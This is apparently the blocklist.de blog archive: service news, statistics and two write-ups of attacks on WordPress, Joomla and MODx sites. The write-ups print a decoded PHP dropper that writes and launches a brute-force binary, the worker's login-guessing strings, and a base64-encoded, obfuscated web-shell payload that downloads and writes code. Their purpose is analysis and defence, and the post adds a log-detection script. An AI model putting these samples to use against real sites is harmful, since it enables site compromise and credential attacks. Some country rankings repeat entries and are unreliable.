2010
04.23

The blog of www.blocklist.de is mainly used to archive statistics.

Whenever there is something interesting, it is published here. That includes, for example, new attacks or waves of new patterns, or cases where a type of attack could be attributed to a botnet or a worm.

2022
02.28

Exciting news about blocklist.de

https://www.prnewswire.com/news-releases/abusix-inc-to-take-over-the-operation-of-blocklistde—a-free-intrusion-detection-intelligence-service-301490589.html?tc=eml_cleartime

 

BOSTON and MUNICH, Feb. 28, 2022 /PRNewswire/ — Abusix, a network security company for mail security and abuse report handling, takes over blocklist.de to integrate it within its Abusix platform to further improve its data quality.

 

Blocklist.de is based on the popular open-source intrusion prevention framework fail2ban, which is part of almost every Linux distribution in the market. It is widely used to protect systems from simple brute force attacks, by logging intrusion attempts on a variety of available services and blocking IPs based on too many authentication failures.

"Blocklist.de, in addition to fail2ban, offers a way to share information about intrusion attempts with other users of the service to improve coverage," says Martin Schiftan, founder of blocklist.de. "In addition, we report those intrusion attempts back to the network operator in question for proper abuse management."

 

Martin Schiftan started blocklist.de in 2006 and grew the service to several thousand users, processing hundreds of thousands of security events per day. While running multiple projects, Martin Schiftan realized that he could not prioritize every single project the same. As blocklist.de is already using Abusix’s ContactDB and the reporting format XARF, the decision to ask Abusix to take over blocklist.de was set.

"Having a similar mindset and sharing the same ideas about improving the internet, it was a pretty easy decision from our side to integrate blocklist.de into our Abusix services," states Tobias Knecht, founder and CEO of Abusix.

For the time being, nothing will change for the existing blocklist.de user base. Within the next few months, Abusix is planning to integrate the blocklist.de services within its platform gradually, so that the existing userbase can benefit from even more lists and features.

 

The Abusix Platform is an advanced data platform that collects security-focused data from thousands of internal and external sources. It processes, enriches, and vets this information and makes it available to a broad audience based on their use cases, such as abuse management, spam and traffic filtering, and many more.

 

About Abusix
Abusix provides the missing piece in today’s network security environment that allows for quick and reliable mitigation of network abuse and other cyber threats. Hundreds of ISPs, Telcos, Cloud & Hosting providers, and Enterprises rely on Abusix to keep their networks secure and their users safe.

For more information, visit www.abusix.com

Contact:
Tamara Hurtmann
+49 721 75406590
330287@email4pr.com

SOURCE Abusix

2021
04.29

MySQL problems in the last days

In the last few days we had some MySQL server issues.

The server crashed and could only be hard-restarted.

Yesterday we spent a lot of time analysing the log files and optimising settings.

We monitored the server tonight with debug options, and at the moment it looks good.

We will keep an eye on it so that it runs as stably as before.

Some queries are now a little slower, but we will work on optimising them next.

Sorry for the problems.

2021
04.21

Current state: BlockList.DE is still alive

In the last years/months it has been very quiet around blocklist.de.

Recently we changed a lot behind the scenes and dropped a lot of reports/attacks older than the current two weeks.

Old data is already dropped, but not thoroughly enough, which is why we so often ran into problems with the MySQL server.

At the moment it looks strange, because the attack count is dropping from ~24k to 7k, but as long as we do not introduce a bug it will recover in the next days.

And so, yes, blocklist.de is still alive :)

But it is a lot of work and I do not have enough time, so it is going slowly.

2019
11.19

Bounce mails with ": Command died with status 255"

In the last few days there were unfortunately bounce mails to the Fail2Ban sender address with a message like:

<fail2ban@blocklist.de>: Command died with status 255

This is now fixed.

There is also another bug still open that I am working on.

The same goes for the statistics, but because of the high volume they unfortunately do not scale well, and I keep running into problems there.

And yes, the project is still alive and will soon be included in VirusTotal as well :)

Lately the interval at which support mails get processed has also grown somewhat; I am already on it. All mails that are too old, however, will be marked as "resolved" to draw a line.

2016
05.03

Half a year ago, when the first news came up that updates for the Debian LTS release we were running were nearing end of life, we started trying to upgrade the blocklist.de systems.
But it was too hard :(

There were a lot of changes that needed to be fixed manually.

We copied the data to a VPS and worked on that: update the system -> crash... roll back from backup, fix the error, update -> crash... again and again...

After roughly six months we had fixed all errors, and all systems now run the latest version of the OS.

After the first stable updates there were some bugs we did not see ourselves, but blocklist.de users reported them and helped us fix them.

So the blocklist.de site is now almost as fast as the previous system (with a bit more caching).

Only the Munin graphs are broken at the moment, because there were too many users for the Munin system. We are working on it, and for most graphs generation works fine again.

The website now has an A+ rating at SSL Labs:

https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31

https://de.ssl-tools.net/webservers/www.blocklist.de

And the mail system as well. The Rcvr OK failures marked * are not TLS failures: greylisting temporarily rejects the first delivery attempt from an unknown sender, so a one-shot test cannot complete the receive step:

MX Server                                Pref  Connect     Allowed       Can Use     TLS Adv     Cert OK     TLS Neg     Sndr OK     Rcvr OK
smtp-mx.blocklist.de [93.180.154.80]       10  OK (134ms)  OK (135ms)    OK (136ms)  OK (137ms)  OK (442ms)  OK (136ms)  OK (136ms)  FAIL *
smtp-mx2.blocklist.de [46.252.26.16]       20  OK (181ms)  OK (182ms)    OK (180ms)  OK (180ms)  OK (467ms)  OK (183ms)  OK (187ms)  FAIL *
webserver3.blocklist.de [185.21.103.31]    70  OK (140ms)  OK (8,253ms)  OK (131ms)  OK (131ms)  OK (443ms)  OK (132ms)  OK (141ms)  FAIL *
smtp-mx.blocklist.de [93.180.154.80]       80  OK (137ms)  OK (136ms)    OK (133ms)  OK (133ms)  OK (373ms)  OK (134ms)  OK (136ms)  OK (251ms)

* = greylisting is active for the tested address.

 

https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de

What we have already built:

  • notification mail about servers that have sent reports without log files
  • notification mail about servers that have not sent reports for more than 90 days
  • notification mail about servers disabled in your profile (disabled due to false positives...)

The next steps are:

  • make the HTML and CSS ready for mobile devices
  • a writable API to add servers or change settings
  • zoomable Munin graphs
  • a live attack map like http://map.honeynet.org/ (currently offline) or http://www.sicherheitstacho.eu/
  • PHP 7 for the site/API/scripts
  • completing the API as a RESTful API
  • rsync access to the RBL data
  • upgrading the abuse reports to the new (longer) DKIM key
  • updating the language files (with Google Translate) for French, Chinese and more, so that blocklist is available in more languages (including the login pages)
  • generating the statistics from the blog (the ranking of countries and companies) automatically
2016
01.03

WordPress brute-force attacks from hacked Joomla/WordPress sites via libworker.so/libso48.php

In the last few days we have seen a lot of hacked WordPress/Joomla sites that launch outgoing brute-force login attacks against other WordPress sites.

The attackers drop files named libso48.php, libso47.php, libso46.php and call them via GET requests with the parameters id and a:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The User-Agent string that shows up in the logs starts with a literal "--user-agent" (apparently the curl option string passed through verbatim):

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

The dropper checks whether PHP runs as 32- or 64-bit and writes a matching file named libworker (libworker.so in the attacker's naming). Nothing is compiled on the victim: the PHP file carries both precompiled ELF binaries as hex blobs, picks one, patches its EI_OSABI header byte to match the host (Linux or FreeBSD) and starts it in the background with the two GET parameters as arguments.

The libworker.so file then carries out the attacks.

Code from libso48.php (decoded):

<?php
header("Content-type: text/plain");
// Fallback for PHP builds that lack file_put_contents()
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;   // precompiled 32-bit ELF worker, embedded as hex (blob elided here)
$so64 = Hex-Code;   // precompiled 64-bit ELF worker, embedded as hex (blob elided here)
/* Strings visible inside the decoded hex blobs:
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s)
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s)
Error.
<INFO> (%s:%d: errno: %s)
Started xml rpc brute force
.........
*/

// 32- or 64-bit PHP? On 32-bit builds intval() saturates at PHP_INT_MAX = 2147483647
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
// Read the first 8 bytes of the ELF header of /usr/bin/host: byte 8 (offset 7) is
// EI_OSABI, 9 = FreeBSD. The same byte is patched into the dropped worker so the
// host kernel accepts the binary.
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."\n";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
// Start the worker in the background, handing it the two GET parameters as arguments
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete script, decoded (including the decoded hex blobs), is on unphp.net:
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

The hex blob that gets written to the libworker.so file contains the following strings (the NUL separators between the strings are lost in this dump, so several curl arguments and format strings run together):

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

As you can see, the attacker uses curl and runs both xmlrpc brute force and ordinary wp-login.php WordPress login brute force (the wp-login.php POST body is the normal log=...&pwd=...&wp-submit=Log+In form, sent together with the wordpress_test_cookie cookie so that WordPress accepts the login attempt).

If you find libso48.php or libworker.so in your webspace: kill the running libworker processes, remove the files, then clean and update your software.
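As an added example (not code from the blocklist.de project or from the original post), the following Python script checks web-server access logs for the three things described above: the dropper being called (a GET to libsoNN.php carrying both the id and a parameters), the leaked "--user-agent=" header value, and login brute force against wp-login.php/xmlrpc.php, using the same maxretry/findtime idea fail2ban uses. The log lines are constructed for the example; the IPs are documentation addresses and the id/a values are the ones quoted in the post above.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log line: ip ident user [ts] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
DROPPER_RE = re.compile(r'/libso\d+\.php$')        # libso46.php, libso47.php, libso48.php ...
LOGIN_PATHS = {'/wp-login.php', '/xmlrpc.php'}     # the two targets the worker brute-forces

def parse_line(line):
    """Parse one combined-format log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    url = urlsplit(rec['target'])                   # also copes with proxy-style absolute URLs
    rec['path'], rec['query'] = url.path, parse_qs(url.query)
    return rec

def find_dropper_calls(records):
    """Compromised-site side: GET to libsoNN.php with both the id and a parameters."""
    return [(r['ip'], r['path'], r['query']['id'][0]) for r in records
            if r['method'] == 'GET' and DROPPER_RE.search(r['path'])
            and {'id', 'a'}.issubset(r['query'])]

def find_option_leak_agents(records):
    """A User-Agent value that starts with a literal '--user-agent=' is the curl
    option string leaking into the header, as quoted in the post."""
    return sorted({r['ip'] for r in records if r['ua'].lstrip().startswith('--user-agent=')})

def find_login_bruteforce(records, maxretry=5, findtime=600):
    """Target side: IPs with >= maxretry POSTs to wp-login.php/xmlrpc.php inside any
    findtime-second window (fail2ban's maxretry/findtime semantics).
    Returns {ip: total POST count}."""
    by_ip = defaultdict(list)
    for r in records:
        if r['method'] == 'POST' and r['path'] in LOGIN_PATHS:
            by_ip[r['ip']].append(r['ts'])
    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > findtime:
                start += 1
            if end - start + 1 >= maxretry:
                flagged[ip] = len(stamps)
                break
    return flagged

def analyze(lines):
    records = [r for r in map(parse_line, lines) if r]
    return {'dropper': find_dropper_calls(records),
            'option_leak': find_option_leak_agents(records),
            'bruteforce': find_login_bruteforce(records)}

# --- constructed sample log (not real traffic); IPs are documentation ranges ---
UA_FF39 = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
UA_LEAK = ' --user-agent=' + UA_FF39             # header value exactly as quoted in the post
UA_ADMIN = 'Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0'

def _line(ip, ts, request, status, ua):
    return f'{ip} - - [{ts}] "{request}" {status} 512 "-" "{ua}"'

SAMPLE_LOG = [
    # the dropper being triggered on a compromised site (id/a values from the post)
    _line('203.0.113.7', '03/Jan/2016:10:15:01 +0100',
          'GET /wp-content/uploads/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC HTTP/1.1',
          200, UA_FF39),
] + [
    # the worker hammering another site's login: five attempts in 40 seconds, then xmlrpc
    _line('198.51.100.23', f'03/Jan/2016:10:16:{s:02d} +0100', 'POST /wp-login.php HTTP/1.1', 200, UA_LEAK)
    for s in range(0, 50, 10)
] + [
    _line('198.51.100.23', '03/Jan/2016:10:17:05 +0100', 'POST /xmlrpc.php HTTP/1.1', 200, UA_LEAK),
    # a legitimate admin login: one POST, then normal browsing
    _line('192.0.2.5', '03/Jan/2016:10:18:00 +0100', 'POST /wp-login.php HTTP/1.1', 302, UA_ADMIN),
    _line('192.0.2.5', '03/Jan/2016:10:18:01 +0100', 'GET /wp-admin/ HTTP/1.1', 200, UA_ADMIN),
]

if __name__ == '__main__':
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

On a real log, call analyze() on the file's lines: a dropper hit means the site itself is the compromised source (look for libworker, out and err next to the libsoNN.php file and kill the process), while the brute-force hits are the remote IPs to ban or report. The sliding window keeps the same maxretry/findtime meaning as a fail2ban jail, so the thresholds can be copied from jail.local.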

2015
03.06

Current stats of BlockList.de (traffic, users, MySQL load, mails...)

The traffic, load, users and other statistics of blocklist.de for the month 02.2015

Currently blocklist.de has the following stats/users:

User: 2,144

Server: 2,325

Attacks: 246,084,421 since 01.01.2014

Reports: 10,092,816 since 2012

Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)

Web-Traffic: ~309 GB

RBL-/API-Traffic: ~85 GB

Mail (In/Out)-Traffic: ~3,528 GB

Traffic over IPv6 (Mail, Web..): ~5 GB

On top of that there is 6.4 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~8.5 GB per hour.

The MySQL server now uses 62% of its 32 GB RAM (~14 GB cache), and the system load is 1.10 on average.

The web server does not use its full 12 GB RAM and the system load is under 0.7. There are ~25,000 open connections at the same time.

The complete traffic of all systems is roughly 6.6 TB in 02/2015 (the MySQL server's traffic over the non-public IPs is not included).

2014
10.10

Current stats of BlockList.de (users, MySQL load, traffic, mails...)

The traffic, load, users and other statistics of blocklist.de for the month 09.2014

Currently blocklist.de has the following stats/users:

User: 1,719

Server: 1,932

Attacks: 282,138,414 since 05.05.2013

Reports: 8,572,275 since 2012

Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)

Web-Traffic: ~290 GB

RBL-/API-Traffic: ~80 GB

Mail (In/Out)-Traffic: ~3,315 GB

Traffic over IPv6 (Mail, Web..): ~5 GB

On top of that there is 6.1 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~8.4 GB per hour.

The MySQL server now uses 60% of its 32 GB RAM (~14 GB cache), and the system load is 2.40 on average.

The web server does not use its full 12 GB RAM and the system load is under 0.6. There are ~23,000 open connections at the same time.

The complete traffic of all systems is roughly 6.4 TB in 09/2014 (the MySQL server's traffic over the non-public IPs is not included).

2014
10.09

Statistics 09-2014 reborn

After 2 years we are trying to regenerate the per-country statistics month by month again.

The image (up, down, same...) shows the difference from 2012 (the last statistics).

The arrows show the position relative to the previous month (risen, fallen, unchanged).

Sorted by IP addresses (unique):

  1. 29182 CN
  2. 12068 VN
  3. 10280 IN
  4. 8157 US
  5. 7082 RU
  6. 14573 VN
  7. 5651 NoName
  8. 5216 VE
  9. 4054 BR
  10. 3986 UA

Sorted by number of attacks:

  1. 7805582 CN
  2. 6300587 US
  3. 1752518 US
  4. 1533083 PL
  5. 678569 NoName
  6. 537431 FR
  7. 175161 RU
  8. 35833 AT
  9. 35048 DE
  10. 32085 NoASN
2014
09.17

The attacks/code that injected the ELF DDoS malware from clodo.ru and others

I have some sites with outdated software for another project.
Normally the site was secured with a .htaccess file. All sites were secured by quotas and other tools and were also monitored (SHA-1 file-hash checker, process-list checker...).

Two sites have now been hacked, because the .htaccess was temporarily disabled and we forgot to re-enable it.

Then the following requests came in to an outdated MODx Evolution installation:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

The POST variable was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded it is only:
echo "qq11oadnq98cjnwejioln23++";

This first request looks like a probe: the web shell behind italian_country.inc.php base64-decodes and evaluates whatever arrives in the randomly named POST parameter, and the attacker checks the response for the random marker to confirm the shell works before sending the real payload.

Another request was:

85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

POST[„n0b8385“] = „JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=“;

Decoded, the POST variable that was sent is (the web-shell plumbing around it is the usual base64_decode plus eval; only the payload itself is shown):

$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G<)V`F\r{X,E>K\"eczr 7Av?";
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];

/* ... truncated here: Kaspersky flags the full code as a virus ... */

=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67];
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75
].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
$igekj52 = $GLOBALS['xtkzp94']($s38[7]);
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86];
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86];
break;
}
$nneyn30 = $s38[71].$s38[56];
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64)
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86];
$cttgs64 = $rmznz0;
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86];
$cttgs64 = $dfdjy19;
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30))
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30);
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... /* truncated here: Kaspersky flags the full code as a virus */
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86];
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72);
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];

function fildv12($s38, $htxbt38)
{
$ppoqb47 = "";
$ogrpt28 = @$GLOBALS['fjcva91']($htxbt38, $s38[92].$s38[62]);
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS['fjiib51']($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25]))
return FALSE;
$henof76 = @$GLOBALS['dmrqg14']();
@$GLOBALS['npbou10']($henof76, CURLOPT_URL, $htxbt38);
@$GLOBALS['npbou10']($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS['hjiar61']($henof76);
@$GLOBALS['ekyyn43']($henof76);
}
else
{
while(!$GLOBALS['mashg65']($ogrpt28))
$ppoqb47.=$GLOBALS['udsvx59']($ogrpt28, 1024 * 64 );
$GLOBALS['naftp70']($ogrpt28);
}
return $ppoqb47;
}

function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS['fjcva91']($yaxje72, $s38[14].$s38[62].$s38[52]);
if ($negtx78 == FALSE)
{
if (!$GLOBALS['fjiib51']($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56]))
return FALSE;
if ( @$GLOBALS['wtxbv81']($yaxje72, $ppoqb47) === FALSE )
return FALSE;
}
else
{
$jznmi77 = $GLOBALS['acklf72']($negtx78, $ppoqb47, $GLOBALS['aojaf86']($ppoqb47));
$GLOBALS['naftp70']($negtx78);
